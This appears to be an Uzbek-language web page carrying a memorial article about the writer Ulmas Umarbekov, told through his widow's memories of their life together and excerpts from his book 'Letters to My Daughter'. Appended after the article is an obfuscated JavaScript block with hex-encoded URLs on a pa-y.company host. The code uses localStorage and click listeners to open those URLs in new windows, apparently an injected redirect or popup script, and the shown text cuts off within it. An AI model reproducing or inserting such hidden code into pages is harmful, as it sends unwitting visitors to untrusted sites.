Ўлмас Умарбеков:

«Ҳамма даврда ҳалол меҳнат, поклик,
одамийлик қадрланган».

Ўлмас Умарбеков ҳақида давраларда сўз кетганида, одамлар уни фақат яхши, жуда яхши, ажойиб инсон сифатида эслайдилар.
Ҳолбуки, у ҳам ҳамма қатори ҳаётнинг аччиқ-чучугини керагидан кўп тортган, хиёнатни, шафқатсизликни, мунофиқликни ҳам кўрган, аммо бу иллатлар қаршисида ожиз қолмаган, яхшиликка ишонган, ҳақиқатга суянган инсон эди.
Ўлмас Умарбеков оилада ҳам ажойиб турмуш ўртоғи, меҳрибон ота эди. У умрининг сўнгги лаҳзаларигача вафодор рафиқаси – ажойиб аёл Зуҳра Умарбековага бўлган чексиз муҳаббат, севикли фарзанди Умидага беқиёс меҳрини юрагининг энг азиз қатламларида асраб ўтди.
Ўлмас Умарбеков билан бирга салкам 40 йил давомида энг оғир дамларда ҳам бирга бўлган, тақдиридаги жуда катта йўқотишга ҳамон ишонмайдиган, шунга қарамай, ирода, бардош ва ёруғ хотиралар билан яшаётган бу аёл билан суҳбатлашганимизда, икки инсон ўртасидаги самимий туйғуларга қурилган ажойиб муносабатларнинг, жуда улкан муҳаббат мужассамига дуч келдик.
Шунингдек, сизнинг эътиборингизга адибнинг «Қизимга мактублар» китобидан ҳам лавҳалар ҳавола қилишни лозим топдик.
Бу мушоҳадалар сизга инсонга фақат бир марта бериладиган ҳаётнинг қадрига етиш, унинг ҳар бир кунини, ҳар бир лаҳзасини азиз қилишга ўргатса, шояд.

2004 йилнинг ёзида устозимиз профессор Озод Шарафиддинов билан Ўлмас Умарбеков ҳақида суҳбатлашган эдик. Ўшанда Озод ака шундай дегандилар:
«Румийдан сўрашибди: «Устоз, сизнинг қабрингизни қаердан излайлик?». Устоз айтибдилар: «Мени изламоқчи бўлсангиз, мухлисларнинг юрагидан излангиз».
Ўлмас Умарбеков гарчи оламдан ўтиб кетган бўлса-да, у ҳам мухлислар юрагида қолди. Тўғри у билан ҳар куни гаплашган, унинг ижодини ипидан-игнасигача ўрганган, у ҳақида жуда кўп ёзган эмасман, лекин унинг жуда яхши инсон, яхши ёзувчилигини яхши билардим.
Антон Павлович Чеховнинг бир гапи бор: «Одамда ҳамма нарса гўзал бўлиши керак: юзи ҳам, кўзи ҳам, қалби ҳам, юриш-туриши ҳам». Ўлмасда ҳамма нарса гўзал эди. Бу гапни Чехов Ўлмасни кўриб ёзмаганмикин, Чехов Ўлмас Умарбековни кўрганидан кейингина шундай фикрга келган, деб ўйлардим».
Ўлмас Умарбеков чинданам таърифга лойиқ даражада гўзал, ақли расо инсон эди. Бунинг ўзига хос сабаблари ҳам бор. У одамларга бор-йўғини улаша оладиган мард, хокисор отанинг узоқ кутилган фарзанди эди. Шунданми, оғир, вазмин, уруш даҳшатларини фронт ортида гўдаклигидаёқ ҳис қилиб улгурган бу йигит Зуҳра исмли қиз билан танишганида унинг таржимаи ҳолини эшитиб ўзини ортга тортмади, у билан ўз тақдирини боғлашдан қўрқмади. Онасидан уч ёшида, урушга кетган отасидан саккиз ёшида ажралиб, болалар уйида вояга етган қиз унинг кўзларига дунёдаги энг олижаноб, энг яхши қиз бўлиб кўринди.
Улар аввалига кутубхонада учрашиб қолардилар. Куз келиб, талабалар пахта теримига отланганларида, Ўлмас Умарбековни бригадир бўлиб тайинлашар, у пахта далаларини отда айланиб юрар, қизларнинг пахта тўла этагини хирмонгача олиб боришга ёрдамлашарди. У яқинлашиши билан ҳамма қизлар ҳаяжонлана бошлашар, назарларида бу гўзал йигит уларнинг олдига атай гаплашгани келаётгандек туюларди. Лекин бу йигит Зуҳрахоннинг олдига келар, ўзини олиб қочаётган нозик-навниҳол қиздан «Менинг ёрдамим сизга керак эмасми?» деб секингина ийманиб сўрарди.
Қизлар бу ҳолни бир-икки кузатганларидан сўнг тушундиларки, гап бошқа ёқда экан. Шунинг учун дарров Зуҳрага имлашар, «Зуҳра, Зуҳра, Умарбеков яна сен томон келяпти» деб пичирлашишарди.
Совуқ қиш кунларидан бирида университетда шахмат ўйини бўлиб ўтди. Мусобақада иккинчи курс талабаси Зуҳра ҳам иштирок этганди. Ўша пайтда Ўрта Осиё Давлат Университети Карл Маркс кўчасида жойлашганди. Ўйин тугаганида анча қоронғу тушиб қолгани учун Ўлмас Зуҳрани уйигача кузатиб қўймоқчи бўлди. Лекин «Менинг уйим яқин. Ҳеч овора бўлманг. Мен ётоқхонада тураман» деган жавобни олди у кўзларини ердан узмай зўрға гапираётган қиздан. «Сиз бошқа шаҳардан келганмисиз?» деб сўради йигит унинг жавобидан сўнг. Шунда Зуҳра унга ўз ҳаётини, ота-онадан етим қолгани, болалар уйида катта бўлгани, ҳозир ётоқхонада истиқомат қилишини айтиб берди. Шу кундан бошлаб йигит қизни ётоқхонагача кузатиб қўядиган бўлди.
«Бир куни қаттиқ совуқ эди. Лайлак қор ёқарди. Ётоқхонага яқинлашиб қолганимизда, «Палътонгизнинг ёқасини кўтариб олинг» дедилар ва қўллари билан ёқамга ишора қилдилар. Қизлар деразадан қараб туришган экан, «Ў, Умарбеков Зуҳрани севиб қолгани рост шекилли» деб роса гапиришган. Йўқ, бу қандайдир ғийбат эмасди, ҳасад ҳам эмасди, дугоналарим менга чин кўнгилдан ҳавас қилишарди. Чунки, Ўлмас ака университетда энг чиройли йигитлардан бири эдилар. Қолаверса факультет комсомол ташкилотининг секретари эдилар» , – деб эслайдилар Зуҳра опа.

  • Бир куни Навоий театрига билет олиб келганлар. Мен бормадим. Билетларни кўз олдимда йиртиб ташладилар. «Агар сиз бормасангиз, мен ҳам бормайман», – дедилар чин кўнгилдан хафа бўлиб.
    Кейинги гал яна билет олиб келганларида «Қўрқманг, фақат сиз эмас, факультетдагиларнинг ҳаммалари боряптилар», – дедилар.
    Буларнинг меҳрибонликларини кўриб, шодлигим ичимга сиғмасди».
    «Қизимга мактублар» асаридан «Умида, мен сенга айтсам, опанг билан топишганимиздан буён, елкамдан турмуш ташвишлари ағдарилди-қўйди. Кел, энди сенга опанг билан қандай танишганимизни айтиб бера қолай. Опанг билан факультет кутубхонасида танишганмиз. Ўшанда мен учинчи курсда ўқирдим.
    Мен кечқурун ўқишдан кейин кутубхонада қолиб, очеркми, ҳикоями ёзишга ҳаракат қилардим.
    Мен ўшанда кичкина, нимжон, сочини битта қилиб ўриб, орқасига ташлаб олган қизни кўп кўрадиган бўлиб қолдим. Ўзимдан-ўзим уни кузатадиган бўлиб қолдим, келмаса хавотир оладиган бўлиб қолдим. Университетнинг орқасида ётоқхонада турар экан. Исми Зуҳра экан».

Улар учрашиб турдилар. Зуҳрахонни лагерга вожатий бўлиб юборганларида ҳам, Ўлмас уни тез-тез кўргани бориб турарди. «Ўша пайтда камбағалчиликданми, кино, театрга пул йўқ эканми, кўпроқ кўча айланардик, – деб хотирлайдилар хиёл жилмайиб Зуҳра опа. – Бир куни учрашувга дугоналарим юзимга упа суриб чиқариб юборишди. «Ахир у ниҳоятда гўзал йигит. Бунақа чиқсанг, уят бўлади-ку» дейишди. Ўлмас ака эса, «Вой, нега юзингизга ун суриб чиқдингиз?», – дегандилар.
Бир куни «Ўзингиз билан паспортингизни олинг», – дедилар. Мен «хўб» дедиму, лекин тушунмадим. Бир вақт қарасам, ЗАГСга олиб бордилар. У ердаги аёл «Бизда бир ойлик синов муддати бор. Бир ойдан кейин келасизлар», деди бизларга. « Бир ой дейсизми? Вой-бў, бунча кўп. Бир ойгача ўлиб қоламан-ку» деганларида роса кулганман.
Дабдабасиз ЗАГСдан ўтганмиз».

«Қизимга мактублар» асаридан. «Бир кун келиб, опангга албатта уйланишим кераклиги, фақат опанг билан турмуш қуришим мумкинлиги равшан бўлиб қолди. Тўйимиз 1956 йилнинг 30 сентябрида эски ҳовлимизда бўлди».
Тўй Ўлмас аканинг ҳозирги «Россия» меҳмонхонаси, Миробод бозори олдидаги ҳовлиларида бўлиб ўтди. Келиннинг бошига оқ рўмол ёпдилар, куёв ўзининг кундалик костюм-шимида эди. Ҳеч кимни келиннинг сеплари бор-йўқлиги қизиқтирган ҳам эмас. Орадан ўтган йиллар давомида ҳам бу масала ҳеч қачон оила аъзолари томонидан муҳокама ҳам қилинган эмас. Бу ҳам Ўлмас аканинг қандай бағри кенг, оқибатли одамлар орасида вояга етганини кўрсатади.
«Биринчи асарларига катта мукофот ҳам олганлар. Оталари жуда хурсанд бўлганлар. Биласизми, агар одам бир-бирини яхши кўрса, пулнинг аҳамияти бўлмайди. Шу уйни ҳам биттадан тахта олиб келиб қурганмиз. Эрталаб туриб, Тезиковка бозорига чиқиб қурилиш молларини сотиб олардик», – деб хотирлайдилар Зуҳра опа.
Ўлмас акага отасидан қолган бу ҳовлига ёш эр-хотинлар кўчиб келганларида 1959 йил эди. Уни ўз кучлари билан жуда кўп йиллар давомида тикладилар. Фақат ҳалол топилган маблағларга тикладилар.
Ўлмас Умарбеков вафот қилганларида маъракаларда иштирок этганлар орасида оддий, хашаму безакдан ҳоли ҳовли, уй-жойни кўриб хайрон бўлганлар ҳам, ҳайратдан ёқа ушлаганлар, «Ўлмас Умарбеков министр бўлганди, Бош Вазир ўринбосари бўлганди, уйларини қаср қилиб юбориши ҳам мумкин эди-ку. Наҳотки шунақа ҳовлида турган бўлса» деб гапирганлар ҳам бўлди.
«Кийим-кечакка ҳам аҳамият бермасдик. Иккита кўйлагим бўлишидан уялардим. Ҳозир шу ёшимда ўйлайман, бойликка берилишдан келиб чиқмайдими аслида дунёдаги барча фожеалар.
Пул одамни бахтли қилолмайди. Пул деб ҳамма нарсадан воз кечиш мумкин эмас», – деб ҳисоблайдилар Зуҳра опа.
«Зуҳра опа, айтингчи, Ўлмас Умарбеков ҳаётда бахтли эдиларми?» – деб сўрайман.
Зуҳра опа бошларини бир оз ерга эгадилар, ниманидир хотирлагандек, жимгина сўзлайдилар: «Жуда бахтли пайтлари ҳам бўлган. Лекин ҳар доим бахтли бўлганлар деб айта олмайман. Совет ёзувчиси бўлиш қийин эди. Совет ёзувчиларининг асарларидан конфликтсизлик талаб қилинарди. Ҳаёт эса, ҳаётда эса ҳамма нарса таомила бошқача эди, ахир ҳаёт бўлганидан кейин муаммо ҳам бўлиши табиий-ку. «Ҳамма нарса инсон учун» дейилардию, лекин аслида ундай эмасди.
«Одам бўлиш қийин» асарларини ёзганларида, гарчи мукофот олганларига қарамай, бир неча бор матбуотда уни ёмонлаб, танқид қилиб чиқишди. «Нега қаҳрамон ўлади? Ахир совет ёшлари бахтиёр ёшлар-ку» деган гаплар роса кўп бўлган.
Айниқса, Марказқўмда ишлаган пайтлари жуда қийналардилар. Одамларга ёрдам бера олмаганларидан қийналар эдилар.
«Бугун ҳам қанча одам ёрдам сўраб олдимга кирди. Одамларга ёрдам бериш керак. Лекин қўлимдан келмайди», – дердилар».
Ҳолбуки, бу лавозимларда ўтирган жуда кўплаб одамлар қатори у ҳам юртдошларининг муаммолари, ташвишларига бармоқ орасидан қараши, барча муаммолари амал курсиси туфайли хамирдан қил суқургандек осон ҳал бўлган баъзи собиқ Шўро амалдорлари каби одамларни қизил гиламлар солинган хоналардан қувиб чиқариши мумкин эди. Лекин бундай яшашга унинг виждони йўл қўймасди. У – ёзувчи эди, виждонли инсон эди. Шунинг учун ҳам унинг ҳаётидан ҳам, ёзган асарларидан ҳам «Виждон» деган сўз қизил ип бўлиб ўтганди.
Тўғри, мезонлар ўзгарар, ҳаёт ўзгараркан, лекин халқнинг анъаналар, азалий қадриятларга бўлган муносабатлари ўша-ўша бўлиб қолавераркан. Халқимизнинг виждон масаласи, виждонли одамларга бўлган ҳурмати муҳаббати ҳам ўша-ўша бўлиб қолаверди. Бугун ўйлаб қарасанг, бизга Ўлмас Умарбековнинг кучли, ҳалол, виждонли қаҳрамонлари етишмаётган экан. қани эди, бу гапларни ёзувчининг ўзи билан ўртоқлашиш, унинг ўзига айтишнинг иложи бўлганида. Афсус. . . Ўлмас Умарбеков орамиздан кетган кундан бизни 12 йил ажратиб турибди.
«Оилада бахтли бўлганлар десам, ўзимни мақтаб юборган бўламан, – деб давом этадилар Зуҳра опа, – 1972 йил узоқ кутилган фарзандимиз ўғлимиз туғилди-ю, оламдан ўтди.
Дадам, ойим ҳаётдан кўз юмишди. Ўзлари оғир касалликка учрадилар, қаттиқ қийналганлар, лекин кучли, иродали одам эдилар, ҳеч нимадан нолимасдилар, ҳамма нарсадан яхшилик топа олардилар».
1990 йил Ўлмас Умарбеков Ўзбекистон Республикаси Вазирлар маҳкамаси Раисининг Биринчи Ўринбосари вазифасини бажараётган йиллар оғир касалликка учради ва ўз аризасига кўра истеъфога чиқди. У гапиролмай қолганди. Машҳур қулоқ, томоқ ва бурун касалликлари профессорига мурожаат қилдилар. «Томоғингиз шамоллаган, наъматак ёқига чайиб туринг» деган маслаҳатни олишди. Лекин дард кундан-кунга зўрайиб борарди. Москвага етиб борганларида, афсус, ҳаммаси кеч бўлган, дард танага ўз ҳукмини ўтказиб бўлганди.
Ўша умидсиз кунлар ташқи дунё билан Ўлмас Умарбековни боғлаб турадиган нарсалар яна унинг бир умрлик ҳамрохи – дафтар ва қалам бўлиб қолди. Ўшанда у иккита дафтар тутган – улардан биринчиси шифокорлар, иккинчиси Зуҳра опа билан бўладиган суҳбатлар учун эди. Бунинг боисини Зуҳра опа энди тушуняптилар. Ўлмас ака хасталик азобини, тушкунлик учқунини турмуш ўртоқларига сездиргилари келмаган экан.
Албатта Зуҳра опа учун бу ҳақда гапириш жуда, жуда ҳам қийин, буни тушуниш қийин эмас:
«Ҳозирги ижодкор ёшлар орасида «Умарбековнинг табассуми» деган гап юради.
ТошМИда ётибдилар. Ўзлари ниҳоятда оғир бетоблар, лабларида эса табассум, менга «Зуҳрахон, мана сиз жуда кўп китобларни ўқигансиз. Нариги дунё ҳақида нималар дея оласиз?», – дейдилар. Ўшанда дарров тушунардим, улар ўлим ҳақида гапирардилар, ёзувчи одамга булар ҳақида гапириш албатта жуда қийин. Кўнглим чўкиб кетарди. Мен «Ўлмас ака, ҳамшира ҳозиргина мана бу дориларни ташлаб кетди, буни ҳозир, бунисини эса бироздан сўнг ичишингиз керак экан» , – деб уларни чалғитмоқчи бўламан. Улар эса, «Йўқ, сиз менга айтинг, одамнинг руҳи ўлмайди, дейишади, шу ростми?» деб мени саволга тутардилар.
«Ўлмас ака, тўғри айтдингиз, одамнинг руҳи ўлмайди» дейман жимгина. Бир куни «У дунёда мен сизни қандай топаман?» деб кейин жим бўлиб қолдилар. «Зуҳрахон, у ёқда ҳам мен сиз билан бўлгим келади. Ўша ерда ҳам сиз менга қарашингизни истайман. Ўзи учратармикинман сизни?» деб ўзларига-ўзлари савол бердилар».
Бугун Зуҳра опа ҳали ҳануз ишдан қайтганларида, хонада Ўлмас ака уларни кутиб ўтиргандек тасаввур, ҳамон дунёдаги энг яхши дори-дармонни сотиб олиш, дунёнинг энг яхши шифокорларидан муолажалар олиш орзуси билан яшайдилар.
Қанчалик буюк муҳаббат ва садоқат! Ҳатто ҳайратга тушасан.
«Касалхонадамиз. Босиқ овоз билан «Мендан кейин қандай яшайсиз?» деб изтиробга тушардилар. «Сиз менга айтинг, мендан кейин сиз қандай яшайсиз?» дердилар. «Ўлмас ака, сиз кетсангиз мен ҳам кетаман. Сизсиз менга ҳаётнинг қизиқи йўқ», – дердим. «Йўқ-йўқ, бунақа деманг. қизимиз ҳали ёш, уни оёққа турғазишингиз керак. Сиз Умидани катта қилишингиз керак. Қанчадан-қанча қўлёзмалар бор. Уларни китоб қилиб чиқаришингиз керак. Майли, кўп яшанг, яхши яшанг, умрингиз узоқ бўлсин. Кейин бир кун борарсиз. Ўша ерда албатта учрашамиз» дердилар.
Мен бугун шу фикрлар билан яшаяпман».
«Қизимга мактублар» асаридан: «Пешонамга шу ёшимда ҳаётдан кўз юмиш ёзилган бўлса, майли шу дақиқани кутиб оламан. Фақат Умида менсиз эзилади. Ўн тўрт ёшда отасиз қолиши, ўртоқлари олдида. . . қийналади. Биламан, Зуҳрага ҳам оғир бўлади. Лекин у иродали, ақлли аёл. Қизининг етим қолганини ҳеч кимга сездирмайди.
Умида! Жоним қизим! Яхшиям худо бизга сени берди. Опанг каби мен учун ҳам энг азиз, энг қимматли, энг ширин ва шакар одамсан. Сенинг бахтли бўлишингни қанчалик исташимни билсанг эди! Омон бўл, қизим. Барча орзуларингга ет. Арзандам, ёлғизим, агар баъзида сени уришган бўлсам, кечир. Фақат яхши ниятда шундай қилганман. Сени яхши кўришимни, ҳеч кимга ишонмаслигимни яхши биласан.
Қизим, агар тақдир тақозоси билан энди кўришмай қолсак, опангни эҳтиёт қил. Уни ҳурмат қил, ёлғизлатиб қўйма. Қаттиқ гапирма, яхши гапингни аяма. Қизим, ҳаётингга гард юқмасин. Бахтли бўл!.. Эй худо! Ўн саккиз минг оламни яратган ўзингсан. Ҳар нарсага қодирсан, ҳар нарсага қудратинг етади. Мен бир гуноҳкор бандангни кечир. Ҳали суяги қотмаган, мустақил ҳаёт қуришга ожиз қизимнинг бахтига менга шифо бер, уни оёққа турганини кўрай, кейин жонимни олсанг, розиман».
Ўлмас Умарбеков жуда кўп инсонлар тасаввурида жуда яхши инсон сифатида қололди. Ҳолбуки, у жуда катта лавозимларда ишлаганди. Ўз манфаатларини биринчи ўринга қўйса ҳам унга ҳеч ким эътироз билдирмаслиги мумкин эди. Лекин у бундай қилолмаган, қилишни истамаганди. Одамлар, халқ олдидаги бурч уларга нисбатан ҳамиша ва ҳар доим яхшилик қилишдек масъулиятли вазифани юклаган. Бу эса ҳамма замонлар учун ҳам ниҳоятда ноёб фазилатдир.
«Бир йили кимдир уларга қимматбаҳо мўйнадан қилинган телпак олиб келиб берадиган бўлибди, олдиндан пулини берибдилар. Кўп ўтмай ишдан телпак билан хурсанд қайтиб келдилар. Ўшанда улар Маданият вазири бўлиб ишлардилар. Мен пакетга ўралган телпакни олаётгандим, бирдан ерга «тап» этиб бир нарса тушди. Қарасам, қоғозга ўралган пул. Жуда кўп пул.
Иккаламиз бир-биримизга қараб қолдик. «Қани, менга олиб беринг-чи», – дедилар. Ростданам пачка-пачка пул эди. «Вой, ярамас, менга пул берибди-я. Биласизми, менга пора бермоқчи бўлибди-я ярамас, – дедилар. Мен энди тушунмай қараб турибман. «Тўхтанг, тўхтанг, буни албатта хотинингизга олиб боринг. Жуда хурсанд бўлади», деганди. «Сиз ўша одамни танийсизми? », дедилар. «Йўқ», – дедим. «Нега ундай деди. Йўқ, сиз алдаяпсиз, сиз уни яхши танийсиз. . . қани, дарров ўранг-чи» деб буюрдилар. Тишлари тишларига тегиб, қалтираб гапиряптилар. Кечаси билан иккимиз ҳам мижжа қоқмадик. Эртасига ишга кетдилар.
Мен кечгача афтадоҳол юрдим. Ишдан келишларини кутиб ўтирдим. Бир вақт келдилар. Коридорда узоқ туриб «келмади» дедилар афсус билан. Ўлмас ака чақирганларини эшитиб ҳалиги одам касалхонага ётиб олибди. Фақат бир ҳафтадан кейин ўша одам олдиларига келибди. Ўлмас ака пакетни очиб «Бу нима?» дебдилар. «Сиз менга пора бердингиз, ҳозир керакли одамларни чақираман. Сизни пора берганликда суд қилишади» дебдилар.
«Ўлмас ака, кечиринг» деб тиз чўкиб ерга ўтириб олибди у. «Шу кунгача фақат шунақа қилардик. Мени шайтон йўлдан оздирди. Ўлмас ака, кечиринг мени. Ўзи айтишувди «Умарбеков пора олмайди деб». Мени кечиринг» деб йиғлабди.
Ўшанда жуда ҳам қаттиқ хафа бўлгандилар», – деб гапириб берадилар Зуҳра опа.
Баъзида одамларнинг оғзиларидан «бу одамлар нимани билишарди» деган аламли сўзларни эшитиб қоламиз. Ўзларининг меҳнатлари эъзозланмагани учун атрофдагиларни айбдордек ҳисоблайдиган бу тоифа одамларнинг ўйлашларича, атрофимиздагиларнинг қалб кўзи, виждони юмиқ.
Йўқ, асло бундай эмас.
Негаки, халқ жуда доно, жуда оқилдир ва у ҳамма нарсани билади, одамлар кимнинг кимлигини яхши билишади. Бу бағри кенг, бир оз соддароқ халқ Ўлмас Умарбековнинг ҳам кимлигини яхши биларди. Унинг «Қизимга мактублар» асарини ўқиган одам айниқса буни яхши ҳис қилади. Бу асар одатий китоблардан бири эмас. Уни ёзувчи ойнинг ёруғида, бамайлихотир ўтириб, узоқ йиллар ўйлаганини қоғозга туширган эмас. Одам қачон вафот этишини билса, яшаш даҳшатга айланади дейишади. Ўлмас ака бу асарни ўз ўлимларини билиб ёзганлар. Лекин ўлимдан қўрқмаганлар. То сўнгги нафаслари чиққунча қаламга содиқ бўлганлар.
Ўлмас акага «Қизимга мактублар» асарини ёзишни Зуҳра опа маслаҳат берган эканлар. «Москвада эдик. Биз ётган палатада унчалик шароит ҳам яхши эмасди. Айниқса ўша йили ҳаво анча паст келиб, ҳар куни ё ёмғир, ё қор ёғарди. Деразадан ташқарига қараб эзилардилар. Шунда мен «Ўлмас ака, бир китоб ёзсангиз, қандай бўларкин. Унда ўзимиз, ота-онангиз ҳақида ёзардингиз» деб маслаҳат бердим. Жуда хурсанд бўлиб кетдилар. Коридорда эски бир тумбочка бор экан. Шунинг синган эшигини олиб келдилар ва тиззаларига қўйиб ёза бошладилар. Назаримда, анча енгил тортган эдилар».
«Қизимга мактублар» асаридан «Тахминан бир ой, бир ярим ойдан сўнг уйга қайтишим мумкин. Қизим, сени кўраман. Укаларим, дўсту биродарларимни кўраман. Умида, сени жуда соғиндим. Деярли ҳар кеча қўнғироқдек овозингни эшитгандек бўламан. Кўз олдимда ўзинг пайдо бўлиб, кўзларинг ёниб, «Ада, келдим» дейсан-да, ёнимга келиб, юзимдан ўпгандек бўласан. Кўп эмас, атиги икки ҳафтадан бери Москвада бўлсам ҳам, ҳар куни сени ўқишдан қайтаётган пайтинг, ўз калитинг билан дарвоза-эшикни очишинг, шахдам қадамлар билан тақ-туқ қилиб айвонга кўтарилишинг кўз олдимдан ўтади. Қизим, жоним қизим, сени яна кўрадиган бўлдим. Орзуим эсон-омон уйга қайтмоқ эди, ниятимга етадиганга ўхшайман. Худо хоҳласа, марҳамат қилса, бир ой, бир ярим ойлардан сўнг тузалиб қайтаман».
Ўлмас Умарбеков ҳам дунёдаги барча оталар сингари фарзандининг келажагини кўргиси келарди. Унга қизи Умиданинг мактабни Олтин медаль, Миллий университет иқтисод факультетини муваффақиятли, сўнг «Умид» жамғармасининг имтиҳонларида муваффақиятли қатнашиб, Манчестердаги университетни молиячи ихтисослиги бўйича якунлаганини кўриш насиб этмаган экан.
Ота қизини худди ана шундай замонавий, ўқимишли, интилувчан, ҳақиқий маънодаги зиёли бўлишини хоҳлаганди. Бугун Умида Лондон университетининг магистратурасида таҳсил олиш баробарида жаҳонга машҳур «Жейпи Морган анд Манхэттен Чейс» компаниясида таҳлилчи лавозимида фаолият юритмоқда. У ўтган йили баҳор ойида турмуш қурди. Хаётнинг қизиқлигини қаранг-ки, Лондонда икки ўзбек – бири – тошкентлик қиз, иккинчиси ўшлик йигит – Умида ва Элбек бир-бирлари билан учрашиб, бир-бирларига кўнгил қўйиб турмуш қурдилар.
«Қизимга мактублар» асаридан «Назаримда Москвада мени даволай бошлаганларидан бери анчагина дилим тинчиб, қўлимга қалам оладиган ҳолатга келганимдан бери сенга атаб ёзмоқчи бўлганларим ниҳоясига етиб қолди. Ҳозирча кифоя. Худо хоҳласа, уйга қайтсам, эсимга тушадиган воқеаларни ёзиб берарман. Хатларимнинг сўнггида устоз Абдулла Қаххорга ўхшаб сенга, қизим, берадиган икки маслаҳатим бор. Биринчиси:

  • Бу дунёда опангчалик сенга меҳрибон, яқин, азиз, сендан жонини ҳам
    аямайдиган одам йўқ. Бирга бўл. Ёлғизлатиб қўйма. Асра.
    Иккинчи маслаҳатим:
  • Давр ўзгариб кетди, қадриятлар ўзгарди. Лекин ҳамма даврда ҳалол
    меҳнат, поклик, одамийлик қадрланган. Шу ёдингда бўлсин.
    Ёлғизим, суюклигим, хайр, омон бўл, бахтли бўл».

Ўша куни 1994 йилнинг ўнинчи ноябри оқшомгача ёмғир қуйган эди. Соат икки яримда Эски Тош МИ касалхонасида Ўлмас Умарбеков ҳаётдан кўз юмди.
Уни ерга қўйганларида ёмғир шаррос уриб йиғлади. Яхши одам бўлишнинг қувончу машаққатларини баробар тортган бу инсонни сўнгги йўлга кузатишда ҳатто табиат ҳам фарёд чекди.
Рафиқаси уйга келиши билан катта соат милларини тўхтатиб қўйди.

Таниқли тележурналист Элмира Раҳматуллаеванинг фейсбукдаги саҳифасидан олинди.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return 